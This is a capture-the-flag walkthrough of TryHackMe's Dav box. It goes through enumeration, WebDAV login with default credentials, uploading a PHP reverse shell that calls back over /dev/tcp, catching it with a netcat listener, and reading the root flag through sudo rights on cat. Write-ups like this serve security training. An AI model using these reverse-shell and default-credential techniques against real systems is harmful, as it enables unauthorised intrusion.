Heyo let's walk it out with yours truly Bobloblaw. This will be a walkthrough of TryHackMe's Dav:
Scanning & Enumeration
As always we start scanning the box with Mayor's Threader3000 which is then fed into an nmap scan:
data:image/s3,"s3://crabby-images/e725e/e725e7bffc4a324ddca6d54fb01855253423b134" alt=""
If you were only to do the nmap scan you can see the syntax from above is:
nmap -T4 -Pn -p80 -A 10.10.232.204
Enumerating Services
The only open port for this box is a web server so let's explore that!
Port 80- http
Visiting the IP address it's just a default apache page with nothing interesting in the source code, so let's enumerate the directories:
data:image/s3,"s3://crabby-images/7c6e0/7c6e02a1fdd6d13eac0d2694d0e72e3c31eb8a9c" alt=""
I use dirsearch to do this:
dirsearch -x 404,403 -e * -r -u 10.10.232.204
We find some interesting directories when we do this, and visiting `webdav` we see that we need to supply some credentials.
data:image/s3,"s3://crabby-images/73e93/73e93b82dca8b6bb00bb64e3467a1722b7b6cb86" alt=""
With some brief research on webdav default credentials we find a wonderful link that gives us the default credentials, and with that we have access!
data:image/s3,"s3://crabby-images/74f71/74f717ddeeec0c264af3d752e2f14693dd0e1a49" alt=""
Vulnerable WebApp
Now that we have credentials, if we actually read the link I showed earlier a bit closer, we see that, once authenticated, we can log in to the webdav directory and may have the ability to upload files. Naturally, I'll try to upload a reverse shell to see if we can get onto the system!
Using cadaver, as shown in the above link, we have access to the system with our credentials:
data:image/s3,"s3://crabby-images/9f873/9f873649f7aff40fed560127301f3c55f7751f04" alt=""
Now to see if we can upload a reverse shell:
data:image/s3,"s3://crabby-images/d2474/d247447adf72ae5c7942a9ecdae389e03c3eb5a4" alt=""
Success! The shell I like to use is this one liner:
data:image/s3,"s3://crabby-images/b9cca/b9ccacac227a85cff0cb8df1ee39dda9719026a5" alt=""
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'");
data:image/s3,"s3://crabby-images/06eb1/06eb17fbf1440af48f743eaac7503d53bbfc7143" alt=""
Awesome!
Getting User Flag
Now that we have uploaded our payload successfully, all we have left to do is catch it with a listener:
nc -nvlp 4444
Setting up my listener and then navigating to the webpage to run the uploaded file we gain a shell:
data:image/s3,"s3://crabby-images/da532/da532aee9f686ccbe1412be2102122a264b0768d" alt=""
As always, I want a fully interactive shell and we do so like this:
python -c "import pty; pty.spawn('/bin/bash')"
ctrl + z
stty raw -echo
fg
fg
export TERM=xterm-256color
Breaking it down:
- The python command executed spawns an interactive bash shell
- We then background the shell we have with ctrl + z
- We then can set up autocomplete and the fully interactive shell with the echo command
- We then foreground the shell twice and we have our fully interactive shell
After executing these commands we have a fully interactive shell which has autocomplete and ctrl+c capabilities. Now let's see if we can get that flag:
data:image/s3,"s3://crabby-images/beb16/beb1683e9edc478439418c47a24aeb06c1666aec" alt=""
Indeed we can!
Root Flag
One of the first things to always check when getting a foothold are your sudo rights. Doing this:
data:image/s3,"s3://crabby-images/dfa32/dfa3223e701bbf62a6c22bbbd48e4620cbdfdbfe" alt=""
We see that we have sudo rights for `cat`, which is mighty convenient for a CTF. Taking advantage of this:
data:image/s3,"s3://crabby-images/636de/636dede07134d52fcbe7b7c7c50d3877eb89636e" alt=""
And we obtain the root flag!
That's all for now, thanks for reading! If there are any questions or feedback about anything I did, as always, you can reach me on the THM website or on their discord server under the name bobloblaw.
Comments